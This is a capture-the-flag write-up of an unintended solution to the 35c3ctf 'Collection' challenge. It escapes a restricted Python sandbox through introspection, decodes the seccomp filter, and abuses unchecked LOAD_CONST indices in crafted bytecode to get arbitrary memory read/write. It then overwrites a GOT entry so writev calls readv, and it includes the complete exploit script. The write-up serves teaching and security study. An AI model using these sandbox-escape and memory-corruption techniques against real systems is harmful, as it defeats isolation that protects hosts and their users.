35c3ctf: Collection - an Unintended Solution!
By David Buchanan, 30th December 2018
The challenge provided the following files:
    dist/
    dist/server.py
    dist/Collection.cpython-36m-x86_64-linux-gnu.so
    dist/test.py
    dist/python3.6
    dist/libc-2.27.so
server.py is a Python script which accepts some user input. It also opens the flag for you and uses dup2 to duplicate the file descriptor to fd 1023. Then, it executes your input with the provided python3.6 interpreter.
One small catch is that the following snippet is prepended to your code:
    from sys import modules
    del modules['os']
    import Collection
    keys = list(__builtins__.__dict__.keys())
    for k in keys:
        if k != 'id' and k != 'hex' and k != 'print' and k != 'range':
            del __builtins__.__dict__[k]
This code attempts to set up a basic Python sandbox. The general idea behind this challenge is to escape the sandbox so that you can read the flag from the already opened file descriptor.
The intended solution is to exploit the custom Collection module which has been made. However, my solution doesn't use it at all :P
First, let's look at what the sandbox prefix actually does:
1. It deletes os from sys.modules.
2. It imports the Collection native module.
3. It deletes every builtin function from the __builtins__ object, except for a few: id, hex, print and range - presumably because the challenge author was feeling generous.
The first step of my unintended solution revolves around the fact that sandboxing Python is very hard to do properly. Removing an object from sys.modules or __builtins__ doesn't actually irreversibly delete it. There will still be plenty of references to it lying around; we just have to search a bit for them.
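To see why deleting the sys.modules entry is not enough, here is a minimal sketch meant to be run in a normal interpreter outside the sandbox (it uses import, which the sandboxed code could not rely on). It assumes CPython's standard library, where the os.path module imports os itself and therefore keeps its own reference to it.

```python
import os
import sys

original_os = os

# Remove the entry, as the sandbox prefix does.
removed = sys.modules.pop("os")

# The module object is still alive: os.path (posixpath or ntpath) did its
# own "import os", so the module is reachable through os.path's globals.
recovered = sys.modules["os.path"].os
still_same_object = recovered is original_os

# Put the entry back so the rest of the interpreter is unaffected.
sys.modules["os"] = removed
print(still_same_object)
```

Deleting a dictionary entry only drops one reference; the object survives for as long as anything else still points at it.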
I used introspection to get back some of the basic builtins to maintain my sanity:
    str = "".__class__
    bytes = b"".__class__
    bytearray = [x for x in b"".__class__.__base__.__subclasses__() if "bytearray" in str(x)][0]
Getting back os was a bit more tricky, but still doable:
    os = [t for t in ().__class__.__bases__[0].__subclasses__() if 'ModuleSpec' in t.__name__][0].__repr__.__globals__['sys'].modules["os.path"].os
(This one is probably a bit more complex than it needs to be, but hey, it works...)
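The one-liner is easier to follow when split into steps. The sketch below is the same chain with intermediate names (object_type, module_spec, recovered_sys and recovered_os are labels introduced here for illustration). It assumes CPython, where importlib's ModuleSpec class is always loaded and its __repr__ is a plain Python function whose globals include sys.

```python
# Step 1: reach `object` starting from a literal, without using any names.
object_type = ().__class__.__bases__[0]

# Step 2: every loaded class is a subclass of object, so we can search for
# one that we know lives in a module holding a reference to sys.
module_spec = [
    t for t in object_type.__subclasses__() if "ModuleSpec" in t.__name__
][0]

# Step 3: a Python-level function exposes the globals of its defining
# module; for importlib's bootstrap code, those globals include sys.
recovered_sys = module_spec.__repr__.__globals__["sys"]

# Step 4: os.path is still registered in sys.modules and holds its own
# reference to os.
recovered_os = recovered_sys.modules["os.path"].os
print(recovered_os.getpid() > 0)
```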
Now that we have os, we can just call os.read(1023, 100), right?
Unfortunately if we try that, we get the following output:
Bad system call (core dumped)
What's going on? It turns out that the Collection module sets up a seccomp filter, which restricts what syscalls we can use.
I used seccomp-tools in order to extract the filters:
    $ seccomp-tools dump "./python3.6 -c 'import Collection'"
     line  CODE  JT   JF      K
    =================================
     0000: 0x20 0x00 0x00 0x00000004  A = arch
     0001: 0x15 0x01 0x00 0xc000003e  if (A == ARCH_X86_64) goto 0003
     0002: 0x06 0x00 0x00 0x00000000  return KILL
     0003: 0x20 0x00 0x00 0x00000000  A = sys_number
     0004: 0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0006
     0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW
     0006: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0008
     0007: 0x06 0x00 0x00 0x7fff0000  return ALLOW
     0008: 0x15 0x00 0x01 0x0000000c  if (A != brk) goto 0010
     0009: 0x06 0x00 0x00 0x7fff0000  return ALLOW
     0010: 0x15 0x00 0x01 0x00000009  if (A != mmap) goto 0012
     0011: 0x05 0x00 0x00 0x00000011  goto 0029
     0012: 0x15 0x00 0x01 0x0000000b  if (A != munmap) goto 0014
     0013: 0x06 0x00 0x00 0x7fff0000  return ALLOW
     0014: 0x15 0x00 0x01 0x00000019  if (A != mremap) goto 0016
     0015: 0x06 0x00 0x00 0x7fff0000  return ALLOW
     0016: 0x15 0x00 0x01 0x00000013  if (A != readv) goto 0018
     0017: 0x06 0x00 0x00 0x7fff0000  return ALLOW
     0018: 0x15 0x00 0x01 0x000000ca  if (A != futex) goto 0020
     0019: 0x06 0x00 0x00 0x7fff0000  return ALLOW
     0020: 0x15 0x00 0x01 0x00000083  if (A != sigaltstack) goto 0022
     0021: 0x06 0x00 0x00 0x7fff0000  return ALLOW
     0022: 0x15 0x00 0x01 0x00000003  if (A != close) goto 0024
     0023: 0x06 0x00 0x00 0x7fff0000  return ALLOW
     0024: 0x15 0x00 0x01 0x00000001  if (A != write) goto 0026
     0025: 0x05 0x00 0x00 0x00000037  goto 0081
     0026: 0x15 0x00 0x01 0x0000000d  if (A != rt_sigaction) goto 0028
     0027: 0x06 0x00 0x00 0x7fff0000  return ALLOW
     0028: 0x06 0x00 0x00 0x00000000  return KILL
     ...
     --- SNIP - relatively unimportant secondary checks omitted ---
     ...
     0098: 0x06 0x00 0x00 0x00000000  return KILL
TL;DR, we can use the following syscalls:
    exit, exit_group, brk, munmap, mremap, readv, futex, sigaltstack, close, rt_sigaction
We can also write to stderr and stdout (I think?), and also use mmap under certain conditions that I couldn't be bothered to decode (we won't be needing this anyway).
The most important thing, which we will need in order to read the flag, is readv.
readv is very similar to the read syscall, except it can perform multiple reads into an array of buffers, all at once. We should be able to use this to read the flag (making use of some of the previously sandboxed objects we restored earlier):
    flag = bytearray(128)
    os.readv(1023, [flag])
    print(flag)
But we are met with the following output!
Trace/breakpoint trap (core dumped)
After some more investigation, it turns out the Collection module has one more trick up its sleeve! When the module is loaded, it patches the main python executable at runtime, and overwrites most of the os_readv_impl function with a bunch of 0xCC bytes (the int3 debugger trap instruction). It's clear that the author of the challenge wanted to prevent us from solving this challenge the "easy" way. Since we can't use os.readv any more, we will have to get some kind of native code execution in order to call the readv syscall ourselves.
Normally, getting native code execution in Python would be easy: just use the ctypes module. However, due to the seccomp restrictions we are unable to load any additional modules. After a bit of research, I encountered this technique for setting up an arbitrary read/write primitive by using custom Python bytecode. It's written for python2, but we can adjust the same concept to work with our 64-bit python3.6 build. This technique looks pretty complex (it kinda reminds me of how some WebKit exploits work), so let's break it down.
The core of this python feature/bug lies in how python interprets its bytecode - specifically the LOAD_CONST opcode:
    /* Python/ceval.c line 1298 */
    TARGET(LOAD_CONST) {
        PyObject *value = GETITEM(consts, oparg);
        Py_INCREF(value);
        PUSH(value);
        FAST_DISPATCH();
    }
The macro GETITEM(consts, oparg) retrieves the object at index oparg from the consts tuple, without any bounds checks (but only when Py_DEBUG is not defined!).
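As a harmless illustration of what oparg means here, the sketch below uses the standard dis module on an ordinary function (sample is a hypothetical function made up for this example) and shows that each LOAD_CONST argument is simply an index into the code object's co_consts tuple. The compiler only ever emits in-range indices; the exploit works by supplying hand-written bytecode whose index is not in range.

```python
import dis

def sample():
    greeting = "hello from co_consts"
    return greeting

code = sample.__code__

# Collect every LOAD_CONST instruction the compiler generated.
load_consts = [
    ins for ins in dis.get_instructions(sample) if ins.opname == "LOAD_CONST"
]

for ins in load_consts:
    # ins.arg is the raw oparg; the interpreter effectively pushes
    # co_consts[oparg] onto the stack.
    print(ins.arg, repr(code.co_consts[ins.arg]))
```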
We can exploit this as follows:
1. Craft a fake bytearray object on the heap.
2. Work out the offset from the consts tuple to a pointer-to-the-fake-bytearray.
3. Craft some bytecode to return a reference to our fake bytearray.
4. Call the custom bytecode.
5. Use our crafted bytearray to read/write any address!
To understand the details of this, we need to look at how CPython stores tuples and bytearrays internally. I've reconstructed the following from the CPython source (The original definitions are full of macros etc.):
    struct PyByteArrayObject {
        int64_t ob_refcnt;           /* can be basically any value we want */
        struct _typeobject *ob_type; /* points to the bytearray type object */
        int64_t ob_size;             /* Number of items in variable part */
        int64_t ob_alloc;            /* How many bytes allocated in ob_bytes */
        char *ob_bytes;              /* Physical backing buffer */
        char *ob_start;              /* Logical start inside ob_bytes */
        int32_t ob_exports;          /* Not exactly sure what this does, we can ignore it */
    };

    struct PyTupleObject {
        int64_t ob_refcnt;
        struct _typeobject *ob_type;
        int64_t ob_size;
        PyObject *ob_item[1];        /* contains ob_size elements */
    };
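The tuple layout can be checked from a normal interpreter with ctypes (not available inside the sandbox, so this is purely for illustration). This sketch assumes CPython, where id() returns the object's address. Rather than hard-coding offsets, it derives them from __basicsize__, since the exact values can differ between CPython versions and builds; on the 64-bit 3.6 build used in the challenge they come out as 0x08, 0x10 and 0x18, matching the struct above. read_word is a helper name introduced here.

```python
import ctypes

POINTER_SIZE = ctypes.sizeof(ctypes.c_void_p)

def read_word(address):
    """Read one pointer-sized word from an address in our own process."""
    return ctypes.c_size_t.from_address(address).value

sample = ("first", "second", "third")
base = id(sample)  # CPython-specific: id() is the object's memory address

# ob_type is the last field of the basic object header, ob_size follows it,
# and ob_item starts where the fixed part of the tuple struct ends.
ob_type_offset = object.__basicsize__ - POINTER_SIZE
ob_size_offset = object.__basicsize__
ob_item_offset = tuple.__basicsize__

type_matches = read_word(base + ob_type_offset) == id(tuple)
size_matches = read_word(base + ob_size_offset) == len(sample)
item_matches = read_word(base + ob_item_offset) == id(sample[0])
print(hex(ob_type_offset), hex(ob_size_offset), hex(ob_item_offset))
```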
Step 1 is easy: we can just put some data inside a real bytearray, and it will be stored on the heap. Step 2 is also easy. Python has a builtin function, id, which (in CPython) returns the memory address of an object. If we add 0x20 to the address of the real bytearray, we get the address of its ob_bytes pointer, which points to our crafted fake bytearray on the heap. Similarly, adding 0x18 to the value returned by id for the consts tuple gives the address of its ob_item array. One thing to note is that the index into the ob_item array that the LOAD_CONST opcode will use is only a signed 32-bit value, but in practice this didn't cause any issues.
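Here is a small sketch of the index arithmetic and of how a 32-bit index is split across EXTENDED_ARG prefixes in Python 3.6's two-byte instruction format. The two addresses are made-up placeholders (real ones come from id() and change on every run), and encode_load_const and decode_oparg are helper names introduced for this example.

```python
OP_LOAD_CONST = 100    # opcode values from dis.opmap on Python 3.6
OP_EXTENDED_ARG = 144

def encode_load_const(index):
    """Emit 3.6 wordcode loading consts[index] for a signed 32-bit index."""
    raw = index & 0xFFFFFFFF  # two's complement representation, 32 bits
    code = bytearray()
    for shift in (24, 16, 8):
        code += bytes([OP_EXTENDED_ARG, (raw >> shift) & 0xFF])
    code += bytes([OP_LOAD_CONST, raw & 0xFF])
    return bytes(code)

def decode_oparg(code):
    """Accumulate the argument bytes, then interpret as signed 32-bit."""
    oparg = 0
    for i in range(0, len(code), 2):
        oparg = (oparg << 8) | code[i + 1]
    return oparg - (1 << 32) if oparg >= (1 << 31) else oparg

# Hypothetical addresses, for illustration only.
fake_bytearray_ptr_addr = 0x7F0000001000 + 0x20  # id(fake_bytearray) + 0x20
const_tuple_array_start = 0x7F0000002000 + 0x18  # id(const_tuple) + 0x18

# ob_item holds 8-byte pointers, so the index is the distance in words.
offset = (fake_bytearray_ptr_addr - const_tuple_array_start) // 8
print(offset, encode_load_const(offset).hex())
```

A negative index works because the accumulated argument is treated as a signed 32-bit integer, so the fake pointer may sit below the tuple in memory as long as it is within roughly 16 GiB of it.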
Once we have a read/write primitive, we can just overwrite the GOT entry for the libc function writev with the address of readv, so that we can use the Python function os.writev in place of os.readv. This works because readv and writev are basically "symmetrical" in the way they work: both take a file descriptor and an array of buffers.
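The symmetry is visible at the Python level too. The sketch below (run in an unpatched interpreter on Linux or another Unix, not inside the challenge sandbox) sends data through a pipe with os.writev and receives it with os.readv; both calls take a file descriptor and a list of buffers.

```python
import os

read_end, write_end = os.pipe()

# writev gathers data from a list of buffers into one write...
sent = os.writev(write_end, [b"hello, ", b"world"])

# ...and readv scatters incoming data into a list of writable buffers.
head = bytearray(7)
tail = bytearray(16)
received = os.readv(read_end, [head, tail])

os.close(read_end)
os.close(write_end)
print(sent, received, bytes(head), bytes(tail[:5]))
```

Because the argument shapes match, the interpreter's os.writev wrapper prepares exactly the arguments readv expects, which is why swapping the GOT entry is enough.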
With that all explained, this is what my final exploit looked like:
    # recreate things we can't import
    str = "".__class__
    bytes = b"".__class__
    bytearray = [x for x in b"".__class__.__base__.__subclasses__() if "bytearray" in str(x)][0]
    os = [t for t in ().__class__.__bases__[0].__subclasses__() if 'ModuleSpec' in t.__name__][0].__repr__.__globals__['sys'].modules["os.path"].os

    # from dis.opmap
    OP_LOAD_CONST = 100
    OP_EXTENDED_ARG = 144
    OP_RETURN_VALUE = 83

    # packing utilities
    def p8(us):
        return bytes([us&0xff])

    def p64(n):
        result = []
        for i in range(0, 64, 8):
            result.append((n>>i)&0xff)
        return bytes(result)

    def u64(n):
        res = 0
        for x in n[::-1]:
            res = (res<<8) | x
        return res

    const_tuple = ()

    # construct the fake bytearray
    fake_bytearray = bytearray(
        p64(0x41414141) +          # ob_refcnt
        p64(id(bytearray)) +       # ob_type
        p64(0x7fffffffffffffff) +  # ob_size (INT64_MAX)
        p64(0) +                   # ob_alloc (doesn't seem to really be used?)
        p64(0) +                   # *ob_bytes (start at address 0)
        p64(0) +                   # *ob_start (ditto)
        p64(0)                     # ob_exports (not really sure what this does)
    )

    fake_bytearray_ptr_addr = id(fake_bytearray) + 0x20
    const_tuple_array_start = id(const_tuple) + 0x18
    offset = (fake_bytearray_ptr_addr - const_tuple_array_start) // 8
    print(offset)

    # construct the bytecode
    bytecode = b""
    for i in range(8, 32, 8)[::-1]:
        bytecode += p8(OP_EXTENDED_ARG) + p8(offset>>i)
    bytecode += p8(OP_LOAD_CONST) + p8(offset)
    bytecode += p8(OP_RETURN_VALUE)

    def foo():
        pass

    foo.__code__ = foo.__code__.__class__(
        0, 0, 0, 0, 0,
        bytecode, const_tuple,
        (), (), "", "", 0, b""
    )

    magic = foo()  # magic is now a window into most of the address space!
    print(magic[0x400000:0x400000+4])  # read the elf header as a sanity check

    readv_got = 0x9b3d80
    writev_got = 0x9b3b28
    read_got = 0x9b32e8
    diff = 0x116600 - 0x110070  # libc_readv - libc_read

    libc_read = u64(magic[read_got:read_got+8])
    print("libc_read @", hex(libc_read))
    libc_readv = libc_read + diff
    print("libc_readv @", hex(libc_readv))

    # replace writev with readv in the GOT
    magic[writev_got:writev_got+8] = p64(libc_readv)

    flag = bytearray(100)
    flaglen = os.writev(1023, [flag])  # actually readv!!!
    print(flag[:flaglen])
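The p64 and u64 helpers are hand-rolled little-endian packers, presumably because the struct module cannot be imported in the sandbox. As a quick sanity check outside the sandbox, the sketch below compares equivalent versions against int.to_bytes and walks through the readv address arithmetic. leaked_read is a made-up example value; the real address depends on ASLR.

```python
def p64(n):
    """Pack an integer as 8 little-endian bytes."""
    return bytes((n >> shift) & 0xFF for shift in range(0, 64, 8))

def u64(data):
    """Unpack little-endian bytes into an integer."""
    value = 0
    for byte in reversed(data):
        value = (value << 8) | byte
    return value

# Hypothetical leaked address of libc's read, for illustration only.
leaked_read = 0x7F1234510070

# Distance between readv and read in the provided libc (from the exploit).
diff = 0x116600 - 0x110070
computed_readv = leaked_read + diff

print(hex(diff), hex(computed_readv), p64(computed_readv).hex())
```

Only the distance between the two functions is fixed within a given libc build, so a single leaked pointer is enough to locate readv.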
PS: I found another good writeup of the LOAD_CONST "bug" here